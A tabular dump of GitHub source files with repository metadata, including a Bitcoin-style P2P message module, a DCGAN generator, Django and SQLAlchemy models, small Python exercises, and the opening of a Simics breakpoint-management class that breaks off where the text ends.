blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4b5c57a1a97e7bd1e2d6a0e5181c1f4ccb65ba5a | 4188f3ad34f69e7b2689322a5992014ed9aeed22 | /csv_demo.py | cac442d489d0aaa68801ab4997638cfef1cc9a94 | [] | no_license | killertilapia/ds-coe-training-2019 | 283f1e08cca0e179c5e9caa7be4e73fdf447b4a0 | 119217e0754aef5bc1a18b522432901e8dd0963f | refs/heads/master | 2020-09-27T08:09:20.155985 | 2019-12-07T08:00:22 | 2019-12-07T08:00:22 | 226,471,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 701 | py | import os
import csv
# this is new
def main(src_path=None, write_path=None):
    """Copy the first 10 rows of a source CSV into a cleaned output CSV.

    Each copied row is also echoed to stdout, space-separated.

    Args:
        src_path: CSV file to read; defaults to ./ds/ds_parts_inductors.csv.
        write_path: CSV file to write; defaults to ./ds/clean_parts.csv.
    """
    if src_path is None:
        src_path = os.path.join(os.getcwd(), 'ds', 'ds_parts_inductors.csv')
    if write_path is None:
        write_path = os.path.join(os.getcwd(), 'ds', 'clean_parts.csv')
    # read csv; newline='' is required by the csv module so the writer does
    # not emit blank rows on Windows
    with open(src_path, mode='r') as src_csv:
        with open(write_path, mode='w', encoding='utf-8', newline='') as write_file:
            reader = csv.reader(src_csv)
            writer = csv.writer(write_file)
            for idx, line in enumerate(reader):
                if idx == 10:  # keep only the first 10 rows
                    break
                print(" ".join(line))
                # process line here
                # bug fix: writerows(line) treated each cell as a separate row,
                # writing one character per column; writerow writes the row.
                writer.writerow(line)

if __name__ == "__main__":
    main()
"killer.tilapia@gmail.com"
] | killer.tilapia@gmail.com |
5eb21b17e0ce8d13350d66f54625e94bca759c7b | 9441e20e3f30b64f332436733c0f6bc9b3c876d6 | /lib/python2.7/site-packages/Mezzanine-3.0.4-py2.7.egg/mezzanine/__init__.py | c5e4c1a68515f712749a478e28939331d372378a | [] | no_license | zouluclara/cartridge | 83d1cb6a0ff46881422c7cbc5581d6f82865a5db | d82d463223fd412ac8b1e8c5ea3c53243d8d124e | refs/heads/master | 2021-01-16T18:00:55.091609 | 2014-02-26T14:25:54 | 2014-02-26T14:25:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23 | py |
__version__ = "3.0.4"
| [
"zouluclara@gmail.com"
] | zouluclara@gmail.com |
ac6b9fe528fd1ff5e26e7278bd4b3878b9d4d877 | f07d9d72721c24b4e79bd7847ddb0871c9d04023 | /source/webapp/admin.py | b6b4f28e4e9baffb1222239121dc0d90abd3cdc5 | [] | no_license | RagdIR/exam_end | 57f330c5b885b5dbf86bb9159302ceabf33530af | 06df2db37dc7ec7a04da0288fd6b4d11fcb6232b | refs/heads/main | 2023-02-18T22:52:15.604416 | 2021-01-23T14:42:48 | 2021-01-23T14:42:48 | 331,971,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | from django.contrib import admin
from webapp.models import Users, Friends, Message
# Expose the chat-related models (Users, Friends, Message) in the Django admin UI.
admin.site.register(Users)
admin.site.register(Friends)
admin.site.register(Message)
"ragdirstrogov@gmail.com"
] | ragdirstrogov@gmail.com |
80927fd30b0c4980207e499565b91ff12d163eb7 | e5a74a239d2519882cda53c3f586832c22ab0f41 | /src/backend/app/main/model/book.py | 5d6fbcc3bd565bf63a5f1fefdc018a648e95de3e | [
"MIT"
] | permissive | lnquy/Sale-Manager-Project | b8c568088ab19884ae7bc385de002652a5c957fe | 5c4397d62d056caa24413284a2ae6c9052707e90 | refs/heads/develop | 2020-06-28T12:01:30.676450 | 2019-10-02T16:18:19 | 2019-10-02T16:18:19 | 200,229,132 | 0 | 0 | MIT | 2019-10-29T22:51:12 | 2019-08-02T12:15:11 | Vue | UTF-8 | Python | false | false | 1,292 | py | import datetime
from .. import db
from sqlalchemy.dialects import postgresql
class Book(db.Model):
    """ Book model: a catalog entry with pricing, rating and purchase counters. """
    __tablename__ = "books"
    id = db.Column(db.Integer, autoincrement=True, primary_key=True)
    title = db.Column(db.String(500), nullable=False)
    sub_title = db.Column(db.String(2000))
    # thumbnails / authors / categories are stored as Postgres arrays of strings
    thumbnails = db.Column(postgresql.ARRAY(postgresql.CHAR))
    description = db.Column(db.String(10000))
    long_description = db.Column(db.String(50000))
    price = db.Column(db.Numeric(), nullable=False)
    # aggregate rating: total_rating_point / total_rated gives the average score
    total_rating_point = db.Column(db.Numeric())
    total_rated = db.Column(db.Numeric())
    total_purchased = db.Column(db.Numeric())
    publisher = db.Column(db.String(500))
    published_at = db.Column(db.DateTime())
    published_place = db.Column(db.String(500))
    pagination = db.Column(db.String(100))
    # available e-book file formats, kept as a free-form JSON document
    ebook_formats = db.Column(db.JSON())
    authors = db.Column(postgresql.ARRAY(postgresql.CHAR))
    categories = db.Column(postgresql.ARRAY(postgresql.CHAR))
    created_at = db.Column(db.DateTime())
    updated_at = db.Column(db.DateTime())
    # soft-delete bookkeeping: rows are flagged, not removed
    is_deleted = db.Column(db.Boolean())
    deleted_at = db.Column(db.DateTime())
    def __repr__(self):
        return "<Book #{}: {}>".format(self.id, self.title)
| [
"lnquy.it@gmail.com"
] | lnquy.it@gmail.com |
8c6a4092121b6afd50bfeb41fbe5f6e90c2a433f | ee70c449967f4c1f771da882e7f1b25091a34dc7 | /website/admin.py | 4d1046302bc7245b8e21f4484cec0905a71dea30 | [] | no_license | mayurdhurpate/shilp16 | 6fec78ef8dab62bb0dd288486e8c9bd72578349b | a0f17a4eac0cf5631ade5d2b7b4c3783e7f8a22d | refs/heads/master | 2021-03-19T13:44:17.959859 | 2016-10-03T12:08:19 | 2016-10-03T12:08:19 | 63,174,858 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | from django.contrib import admin
from .models import *
# Register your models here.
admin.site.register(CAUser)
admin.site.register(PPTUser)
admin.site.register(User)
admin.site.register(WorkUser)
admin.site.register(WorkdataUser)
admin.site.register(greUser)
| [
"kushagra.agrawal.civ14@itbhu.ac.in"
] | kushagra.agrawal.civ14@itbhu.ac.in |
52fac62da61576ec22dc52af49eaae937130bdfd | 9ec1242ae20b6f407f25a266456d83fb8a3d5f73 | /src/nellCoin/lib/messages.py | dd5b6fb432476e6c8530ccf6e7483d3a9b8685ad | [
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain",
"MIT"
] | permissive | Nell-MDCoin/Nell-MDCoin | 5b6d6af7e141844ba22970adacd4877d024e872b | 9a1be366aba13539132dc7d0a9f0fdeaa2e19044 | refs/heads/master | 2020-03-21T23:17:23.329553 | 2018-06-29T17:32:53 | 2018-06-29T17:32:53 | 139,177,535 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 9,907 | py | # messages.py
#
# Distributed under the MIT/X11 software license
from __future__ import absolute_import, division, print_function, unicode_literals
import struct
import time
import random
import cStringIO
from nellCoin.lib.coredefs import *
from nellCoin.lib.core import *
MSG_TX = 1
MSG_BLOCK = 2
class msg_version(object):
    ''' "version" handshake message: announces protocol version, services,
        addresses, nonce and sub-version string to a peer. '''
    command = b"version"
    def __init__(self, protover=PROTO_VERSION):
        # NOTE(review): the protover argument sets nVersion but self.protover is
        # forced to MIN_PROTO_VERSION — looks deliberate (serialize the minimal
        # address form) but confirm against callers.
        self.protover = MIN_PROTO_VERSION
        self.nVersion = protover
        self.nServices = 1
        self.nTime = time.time()
        self.addrTo = CAddress(MIN_PROTO_VERSION)
        self.addrFrom = CAddress(MIN_PROTO_VERSION)
        self.nNonce = random.getrandbits(64)
        self.strSubVer = b'/python-bitcoin-0.0.1/'
        self.nStartingHeight = -1
    def deserialize(self, f):
        self.nVersion = struct.unpack(b"<i", f.read(4))[0]
        if self.nVersion == 10300:
            # historical quirk: version 10300 is treated as 300
            self.nVersion = 300
        self.nServices = struct.unpack(b"<Q", f.read(8))[0]
        self.nTime = struct.unpack(b"<q", f.read(8))[0]
        self.addrTo = CAddress(MIN_PROTO_VERSION)
        self.addrTo.deserialize(f)
        if self.nVersion >= 106:
            self.addrFrom = CAddress(MIN_PROTO_VERSION)
            self.addrFrom.deserialize(f)
            self.nNonce = struct.unpack(b"<Q", f.read(8))[0]
            self.strSubVer = deser_string(f)
            if self.nVersion >= 209:
                self.nStartingHeight = struct.unpack(b"<i", f.read(4))[0]
            else:
                self.nStartingHeight = None
        else:
            # very old peers do not send the trailing fields
            self.addrFrom = None
            self.nNonce = None
            self.strSubVer = None
            self.nStartingHeight = None
    def serialize(self):
        r = b""
        r += struct.pack(b"<i", self.nVersion)
        r += struct.pack(b"<Q", self.nServices)
        r += struct.pack(b"<q", self.nTime)
        r += self.addrTo.serialize()
        r += self.addrFrom.serialize()
        r += struct.pack(b"<Q", self.nNonce)
        r += ser_string(self.strSubVer)
        r += struct.pack(b"<i", self.nStartingHeight)
        return r
    def __repr__(self):
        return "msg_version(nVersion=%i nServices=%i nTime=%s addrTo=%s addrFrom=%s nNonce=0x%016X strSubVer=%s nStartingHeight=%i)" % (self.nVersion, self.nServices, time.ctime(self.nTime), repr(self.addrTo), repr(self.addrFrom), self.nNonce, self.strSubVer, self.nStartingHeight)
class msg_verack(object):
    ''' "verack" message: empty acknowledgement of a peer's version message. '''
    command = b"verack"
    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
    def deserialize(self, f):
        pass
    def serialize(self):
        return b""
    def __repr__(self):
        return "msg_verack()"
class msg_addr(object):
    ''' "addr" message: a vector of known peer addresses (CAddress records). '''
    command = b"addr"
    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.addrs = []
    def deserialize(self, f):
        self.addrs = deser_vector(f, CAddress, self.protover)
    def serialize(self):
        return ser_vector(self.addrs)
    def __repr__(self):
        return "msg_addr(addrs=%s)" % (repr(self.addrs))
class msg_alert(object):
    ''' "alert" message: carries one signed network alert (CAlert). '''
    command = b"alert"
    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.alert = CAlert()
    def deserialize(self, f):
        self.alert = CAlert()
        self.alert.deserialize(f)
    def serialize(self):
        r = b""
        r += self.alert.serialize()
        return r
    def __repr__(self):
        return "msg_alert(alert=%s)" % (repr(self.alert), )
class msg_inv(object):
    ''' "inv" message: advertises inventory (tx/block hashes) as CInv entries. '''
    command = b"inv"
    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.inv = []
    def deserialize(self, f):
        self.inv = deser_vector(f, CInv)
    def serialize(self):
        return ser_vector(self.inv)
    def __repr__(self):
        return "msg_inv(inv=%s)" % (repr(self.inv))
class msg_getdata(object):
    ''' "getdata" message: requests the objects named by a vector of CInv. '''
    command = b"getdata"
    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.inv = []
    def deserialize(self, f):
        self.inv = deser_vector(f, CInv)
    def serialize(self):
        return ser_vector(self.inv)
    def __repr__(self):
        return "msg_getdata(inv=%s)" % (repr(self.inv))
class msg_getblocks(object):
    ''' "getblocks" message: a block locator plus a stop hash, asking the peer
        for block inventory after the locator point. '''
    command = b"getblocks"
    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.locator = CBlockLocator()
        self.hashstop = 0
    def deserialize(self, f):
        self.locator = CBlockLocator()
        self.locator.deserialize(f)
        self.hashstop = deser_uint256(f)
    def serialize(self):
        r = b""
        r += self.locator.serialize()
        r += ser_uint256(self.hashstop)
        return r
    def __repr__(self):
        return "msg_getblocks(locator=%s hashstop=%064x)" % (repr(self.locator), self.hashstop)
class msg_getheaders(object):
    ''' "getheaders" message: same shape as getblocks, but asks for headers. '''
    command = b"getheaders"
    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.locator = CBlockLocator()
        self.hashstop = 0
    def deserialize(self, f):
        self.locator = CBlockLocator()
        self.locator.deserialize(f)
        self.hashstop = deser_uint256(f)
    def serialize(self):
        r = b""
        r += self.locator.serialize()
        r += ser_uint256(self.hashstop)
        return r
    def __repr__(self):
        return "msg_getheaders(locator=%s hashstop=%064x)" % (repr(self.locator), self.hashstop)
class msg_headers(object):
    ''' "headers" message: a vector of block headers (serialized as CBlock). '''
    command = b"headers"
    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.headers = []
    def deserialize(self, f):
        self.headers = deser_vector(f, CBlock)
    def serialize(self):
        return ser_vector(self.headers)
    def __repr__(self):
        return "msg_headers(headers=%s)" % (repr(self.headers))
class msg_tx(object):
    ''' "tx" message: a single transaction. '''
    command = b"tx"
    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.tx = CTransaction()
    def deserialize(self, f):
        self.tx.deserialize(f)
    def serialize(self):
        return self.tx.serialize()
    def __repr__(self):
        return "msg_tx(tx=%s)" % (repr(self.tx))
class msg_block(object):
    ''' "block" message: a single full block. '''
    command = b"block"
    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.block = CBlock()
    def deserialize(self, f):
        self.block.deserialize(f)
    def serialize(self):
        return self.block.serialize()
    def __repr__(self):
        return "msg_block(block=%s)" % (repr(self.block))
class msg_getaddr(object):
    ''' "getaddr" message: empty request for the peer's known address list. '''
    command = b"getaddr"
    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
    def deserialize(self, f):
        pass
    def serialize(self):
        return b""
    def __repr__(self):
        return "msg_getaddr()"
#msg_checkorder
#msg_submitorder
#msg_reply
class msg_ping(object):
    ''' "ping" message: keepalive; carries a nonce only for protocol versions
        newer than BIP0031_VERSION. '''
    command = b"ping"
    def __init__(self, protover=PROTO_VERSION, nonce=0):
        self.protover = protover
        self.nonce = nonce
    def deserialize(self, f):
        if self.protover > BIP0031_VERSION:
            self.nonce = struct.unpack(b"<Q", f.read(8))[0]
    def serialize(self):
        r = b""
        if self.protover > BIP0031_VERSION:
            r += struct.pack(b"<Q", self.nonce)
        return r
    def __repr__(self):
        return "msg_ping(0x%x)" % (self.nonce,)
class msg_pong(object):
    ''' "pong" message: reply echoing the nonce of a received ping. '''
    command = b"pong"
    def __init__(self, protover=PROTO_VERSION, nonce=0):
        self.protover = protover
        self.nonce = nonce
    def deserialize(self, f):
        self.nonce = struct.unpack(b"<Q", f.read(8))[0]
    def serialize(self):
        r = b""
        r += struct.pack(b"<Q", self.nonce)
        return r
    def __repr__(self):
        return "msg_pong(0x%x)" % (self.nonce,)
class msg_mempool(object):
    ''' "mempool" message: empty request for the peer's mempool contents. '''
    command = b"mempool"
    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
    def deserialize(self, f):
        pass
    def serialize(self):
        return b""
    def __repr__(self):
        return "msg_mempool()"
# Wire command name -> message class; message_read uses this to pick the
# deserializer for an incoming frame (unknown commands are dropped).
messagemap = {
    "version": msg_version,
    "verack": msg_verack,
    "addr": msg_addr,
    "alert": msg_alert,
    "inv": msg_inv,
    "getdata": msg_getdata,
    "getblocks": msg_getblocks,
    "tx": msg_tx,
    "block": msg_block,
    "getaddr": msg_getaddr,
    "ping": msg_ping,
    "pong": msg_pong,
    "mempool": msg_mempool
}
def message_read(netmagic, f):
    """Read one framed message from stream f and deserialize it.

    Frame layout: 4-byte magic, 12-byte NUL-padded command, 4-byte payload
    length (unsigned LE), 4-byte double-SHA256 checksum, then the payload.

    Returns the deserialized message object, None when the command is unknown
    or the stream cannot be read; raises ValueError on bad magic or a
    checksum mismatch.
    """
    try:
        recvbuf = f.read(4 + 12 + 4 + 4)
    except IOError:
        return None

    # check magic
    if len(recvbuf) < 4:
        return
    if recvbuf[:4] != netmagic.msg_start:
        raise ValueError("got garbage %s" % repr(recvbuf))

    # check that the fixed-size header arrived in full
    if len(recvbuf) < 4 + 12 + 4 + 4:
        return

    # remaining header fields: command, msg length, checksum
    command = recvbuf[4:4+12].split(b"\x00", 1)[0]
    # bug fix: the length field is unsigned on the wire (message_to_str packs
    # it with "<I"); unpacking with "<i" misread lengths >= 2**31 as negative.
    msglen = struct.unpack(b"<I", recvbuf[4+12:4+12+4])[0]
    checksum = recvbuf[4+12+4:4+12+4+4]

    # read message body
    try:
        recvbuf += f.read(msglen)
    except IOError:
        return None

    # verify the double-SHA256 checksum over the payload
    msg = recvbuf[4+12+4+4:4+12+4+4+msglen]
    th = hashlib.sha256(msg).digest()
    h = hashlib.sha256(th).digest()
    if checksum != h[:4]:
        raise ValueError("got bad checksum %s" % repr(recvbuf))
    recvbuf = recvbuf[4+12+4+4+msglen:]

    if command in messagemap:
        f = cStringIO.StringIO(msg)
        t = messagemap[command]()
        t.deserialize(f)
        return t
    else:
        # unknown command: silently drop
        return None
def message_to_str(netmagic, message):
    ''' Serialize a message object into one complete wire frame:
        magic | 12-byte NUL-padded command | payload length (<I) |
        double-SHA256 checksum[:4] | payload. '''
    payload = message.serialize()
    # checksum is the first 4 bytes of SHA256(SHA256(payload))
    inner = hashlib.sha256(payload).digest()
    checksum = hashlib.sha256(inner).digest()[:4]
    padded_command = message.command.ljust(12, b"\x00")
    parts = [netmagic.msg_start,
             padded_command,
             struct.pack(b"<I", len(payload)),
             checksum,
             payload]
    return b"".join(parts)
"justdvnsh2208@gmail.com"
] | justdvnsh2208@gmail.com |
29418615cd3956b442698533f8144fa90d951f17 | e17a6d897da03d11b0924223c37f92dd841390da | /Python/setoperations.py | ef20ea7b79a2252a9e86bb9e2b8717eefd64838a | [] | no_license | PrudhviRaju1999/Training-npci-iiht | 746c7eb46f5d42d7371e99b4d75b822b33452ac1 | ce42b260ee92a02871c9b5b27cf0dbeb1359d99b | refs/heads/master | 2023-08-08T03:55:10.698492 | 2021-09-29T05:33:22 | 2021-09-29T05:33:22 | 406,335,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 559 | py | ls_set={1,7,3,9,22}
# Exercise 1: print the set, then sort it descending two ways — via sorted()
# and via a manual selection sort (kept for the exercise).
print(ls_set)
print(sorted(ls_set, reverse=True))
nw = []
ls_list = list(ls_set)
while ls_list:
    # bug fix: the loop variable was named `max`, shadowing the builtin;
    # renamed to `largest` (behavior is unchanged)
    largest = ls_list[0]
    for x in ls_list:
        if x > largest:
            largest = x
    nw.append(largest)
    ls_list.remove(largest)
print(nw)
# Assignment 2: check whether three strings are anagrams of each other.
# NOTE(review): nothing is printed when s1 and s2 differ — the outer `if`
# has no else branch; confirm that is intended.
s1 = "mad"
s2 = "bam"
s3 = "adm"
if sorted(s1) == sorted(s2):
    if sorted(s1) == sorted(s3):
        print("Yes 3 strings are anagrams")
    else:
        print("Not anagramas")
# Assignment 3: print the integers missing from the list's min..max range
list_ls = [1, 2, 3, 4, 7, 8, 9]
for i in range(list_ls[0], list_ls[-1] + 1):
    if i not in list_ls:
        print(i)
"90675358+PrudhviRaju1999@users.noreply.github.com"
] | 90675358+PrudhviRaju1999@users.noreply.github.com |
8e7580b71b90f48eb3da61675ce8b7001d524259 | 1f7ae75815f16fc64dcd15a62da8091c87d697ee | /ch2/KthLast.py | a0381b285cefc19b1fcc031ea8ce81c1ac635960 | [] | no_license | danilolau/cracking_coding_interview_py | 4cee0571fd4ba6f6767da6f4af99fe0e41b27912 | 450f00a6f2cfb826b24cbd2242187b892eee9e32 | refs/heads/main | 2023-06-04T11:36:10.302976 | 2021-07-01T19:03:21 | 2021-07-01T19:03:21 | 360,946,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | from structs.linkedlist import Node, LinkedList
def kth_last(k,ll):
pointer = ll.head
kth = ll.head
for _ in range(k):
try:
pointer = pointer.next
except:
break
while pointer!=ll.tail:
pointer = pointer.next
kth = kth.next
return kth
# Demo: build a list of 19 nodes and print it, then print the tail (k == 0).
ll = LinkedList(Node(1))
items = [2,3,4,5,6,5,3,2,3,5,4,3,2,6,7,8,10,1]
ll.append_list_to_tail(items)
print(ll)
print(kth_last(0,ll))
| [
"daniloaraujo@Danilos-MacBook-Pro.local"
] | daniloaraujo@Danilos-MacBook-Pro.local |
9252a85cc583668635a22b48dfa5f1af859fcd61 | d2e76cf29eff1e3a09790828e2cb3070aef53e6d | /CareHub/Profile/migrations/0004_auto_20190215_1717.py | e83314d086a9c618f220aa04724b414a8425d1d0 | [] | no_license | ganzourii/SE2018G10 | 2774e0dde00ba0d8ea990ac3db26fd8c0b744ca5 | 22d314494bca84550a4cbbdcc7dbf713491588ed | refs/heads/master | 2020-03-30T19:26:31.679332 | 2019-02-17T08:48:34 | 2019-02-17T08:48:34 | 151,542,753 | 0 | 7 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | # Generated by Django 2.1.2 on 2019-02-15 15:17
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration: redefine Patient.image with a bundled
    default picture.  Do not hand-edit generated migrations casually."""
    dependencies = [
        ('Profile', '0003_auto_20190215_1711'),
    ]
    operations = [
        migrations.AlterField(
            model_name='patient',
            name='image',
            # NOTE(review): upload_to begins with a space (' patient_profile_pics')
            # — looks accidental, but changing it would alter stored paths; confirm.
            field=models.ImageField(default='static/patient_profile_pics/defaultPatient.jpg', upload_to=' patient_profile_pics'),
        ),
    ]
| [
"36420865+mr-rofl@users.noreply.github.com"
] | 36420865+mr-rofl@users.noreply.github.com |
0be50c038d2051c58ca35de90c9f30e0b014333a | fbf7f71ded0da35144e7890372fb966ceb24aa35 | /generator/__init__.py | 6c3ce4bfb0ab575c2528b6449413e4c3e3524d98 | [
"MIT"
] | permissive | shivamswarnkar/Image-Generator | 93477864db0a8b2cd50d717b6dfe450a365249d8 | 55b6d066c84c615403e48c27e77ee017cf260955 | refs/heads/master | 2021-07-15T20:47:23.379504 | 2021-07-10T07:54:23 | 2021-07-10T07:54:23 | 218,314,417 | 15 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | import torch.nn as nn
# Generator Network
class Generator(nn.Module):
    """DCGAN-style generator network.

    Maps a latent tensor with args.nz channels (spatial size 1x1) through a
    stack of strided transposed convolutions to an args.nc-channel 64x64
    image squashed into [-1, 1] by the final Tanh.

    Expected attributes on args: ngpu, nz (latent channels), ngf (feature-map
    width), nc (output channels).
    """
    def __init__(self, args):
        super(Generator, self).__init__()
        # NOTE(review): ngpu is stored but not used in forward(); presumably
        # intended for DataParallel dispatch by the caller — confirm.
        self.ngpu = args.ngpu
        self.main = nn.Sequential(
            # input Z; First
            nn.ConvTranspose2d(args.nz, args.ngf * 8, 4, 1, 0, bias=False),
            nn.BatchNorm2d(args.ngf * 8),
            nn.ReLU(True),
            #second
            nn.ConvTranspose2d(args.ngf * 8, args.ngf * 4, 4, 2, 1, bias=False),
            nn.BatchNorm2d(args.ngf*4),
            nn.ReLU(True),
            #third
            nn.ConvTranspose2d(args.ngf*4, args.ngf*2, 4, 2, 1, bias=False),
            nn.BatchNorm2d(args.ngf*2),
            nn.ReLU(True),
            # fourth
            nn.ConvTranspose2d(args.ngf * 2, args.ngf, 4, 2, 1, bias=False),
            nn.BatchNorm2d(args.ngf),
            nn.ReLU(True),
            # output nc * 64 * 64
            nn.ConvTranspose2d(args.ngf, args.nc, 4, 2, 1, bias=False),
            nn.Tanh()
        )
    def forward(self, input):
        """Run the latent batch through the deconv stack."""
        return self.main(input)
"ss8464@nyu.edu"
] | ss8464@nyu.edu |
9d9c1305ed57e2a327da571c32f06702b2a1fc11 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /Akx92Ldcy78xp5zCF_4.py | 9d5e1d493ab24f7c6508ffe8f4080fda61583184 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 669 | py | """
The function is given two strings `t` \- template, `s` \- to be sorted. Sort
the characters in `s` such that if the character is present in `t` then it is
sorted according to the order in `t` and other characters are sorted
alphabetically after the ones found in `t`.
### Examples
custom_sort("edc", "abcdefzyx") ➞ "edcabfxyz"
custom_sort("fby", "abcdefzyx") ➞ "fbyacdexz"
custom_sort("", "abcdefzyx") ➞ "abcdefxyz"
custom_sort("", "") ➞ ""
### Notes
The characters in `t` and `s` are all lower-case.
"""
def custom_sort(t, s):
return ''.join(sorted(list(s), key=lambda x: t.index(x) if x in t else ord(x) ))
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
bcf4526e435d550484e29273775b5f583c8ac4a2 | d60d72fb2a43fe64382f00d4c99d9481e281a1bc | /Scripts RNA Adaline/TratamentoDadosIMDB.py | 81b5a0cf0ddb08d6e3c9610d8ae1646de482e674 | [] | no_license | MarcoAntonioGomes/Trabalho-de-IA---Classifica-o-de-Coment-rios-do-IMDB | 94c0cf2c5830c253d88cbfd9f44170ebe125a086 | 2a0e095e1647852af57c5ea19d10162db6c4226e | refs/heads/master | 2021-09-01T07:24:20.902673 | 2017-12-25T16:48:03 | 2017-12-25T16:48:03 | 115,351,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,220 | py |
"""
Created on Sun Dec 3 13:10:22 2017
@author: Marco
"""
from sklearn.datasets import*
from sklearn.feature_extraction.text import *
# Class labels come from the sub-folder names of the dataset directory.
categorias = [ 'Negativo' , 'Positivo']
# Load labelled IMDB comments from disk (one folder per class).
dados = load_files("C:\\Users\\Marco\\Desktop\\6º Periodo\\Inteligencia Artificial\\ComentariosIMDB", description = None , categories = categorias , load_content = True , shuffle = True , decode_error = 'strict' , random_state = 0 )
# Collect the indices of the negative (class 0) samples.
indiceNegativos = list()
for i in range (len(dados.target)):
    if dados.target[i] == 0:
        indiceNegativos.append(i)
count_vect = CountVectorizer() # build the bag-of-words vocabulary
dados_counts = count_vect.fit_transform(dados.data) #
#print(dados_counts)
#print(count_vect.vocabulary_.get('great'))
# Term frequencies (tf) without inverse-document-frequency weighting ...
tf_transformer = TfidfTransformer(use_idf = False).fit(dados_counts)
dados_tf = tf_transformer.transform(dados_counts)
# ... and the full tf-idf weighting for comparison.
tfidf_transformer = TfidfTransformer()
dados_tfidf = tfidf_transformer.fit_transform(dados_counts)
print(dados_tfidf)
print("-----------------------------------------------------------------------------------------------")
#print(dados_tf)
feature_names = count_vect.get_feature_names()
#print(len(feature_names))
#print(feature_names)
#print(feature_names[73821])
"marcoantonio.gomes@yahoo.com.br"
] | marcoantonio.gomes@yahoo.com.br |
a6388fd226aa360a3e348f2f9468dcad02a7a36f | f4e57645e92b594dcf611336b774f9febcd09923 | /simics/monitorCore/genContextMgr.py | 7d63179158f92977c44f66d185ba05a758005c85 | [] | no_license | kingking888/RESim | 24dc63f23df59c66a4aa455cef25a71ecbf2958a | cb3ea4536df5f93719894db83fbfbe42eb25309a | refs/heads/master | 2023-03-21T00:11:12.327617 | 2021-03-19T22:37:32 | 2021-03-19T22:37:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45,525 | py | from simics import *
'''
Track task context and set/remove beakpoints & haps accordingly. Currently recognises two contexts:
default & RESim. Also has a carve-out for "maze_exit" breakpoints/haps, managed as an attribute of
the hap. Designed to watch a single thread group.
There is one instance of this module per cell.
'''
class GenBreakpoint():
    """Bookkeeping record for one Simics breakpoint managed by GenContextMgr.

    The actual SIM_breakpoint is created later by GenHap.set(); this object
    only carries the parameters plus the stable context-manager handle.
    """
    def __init__(self, cell, addr_type, mode, addr, length, flags, handle, lgr, prefix=None):
        self.cell = cell
        self.addr_type = addr_type
        self.mode = mode
        self.addr = addr
        self.length = length
        self.flags = flags
        self.break_num = None   # Simics breakpoint id once armed; None while cleared
        self.lgr = lgr
        self.handle = handle    # context-manager break handle (stable across set/clear)
        self.prefix = prefix
        self.set()
    def show(self):
        print('\tbreak_handle: %s num: %s add:0x%x' % (str(self.handle), str(self.break_num), self.addr))
    def set(self):
        # intentionally a no-op: the breakpoint is created in GenHap.set()
        #self.break_num = SIM_breakpoint(self.cell, self.addr_type, self.mode, self.addr, self.length, self.flags)
        ''' do set in hap? '''
        pass
        #self.lgr.debug('GenBreakpoint set done in hap, the break handle is %d' % self.handle)
    def clear(self):
        # delete the Simics breakpoint if it was ever armed
        if self.break_num is not None:
            #self.lgr.debug('GenBreakpoint clear breakpoint %d break handle is %d' % (self.break_num, self.handle))
            SIM_delete_breakpoint(self.break_num)
            self.break_num = None
class GenHap():
    """One Simics hap (callback) registered over one or more GenBreakpoints.

    set()/hapAlone() create the real SIM breakpoints and the callback; clear()
    tears both down.  NOTE: hapAlone uses a tuple parameter — Python 2 only.
    """
    def __init__(self, hap_type, callback, parameter, handle, lgr, breakpoint_list, name, immediate=True):
        ''' breakpoint_start and breakpont_end are GenBreakpoint types '''
        self.hap_type = hap_type
        self.callback = callback
        ''' used with afl '''
        self.parameter = parameter
        self.breakpoint_list = breakpoint_list
        self.lgr = lgr
        self.hap_num = None     # Simics hap id once registered
        self.handle = handle    # context-manager hap handle
        self.name = name
        self.set(immediate)
    def show(self):
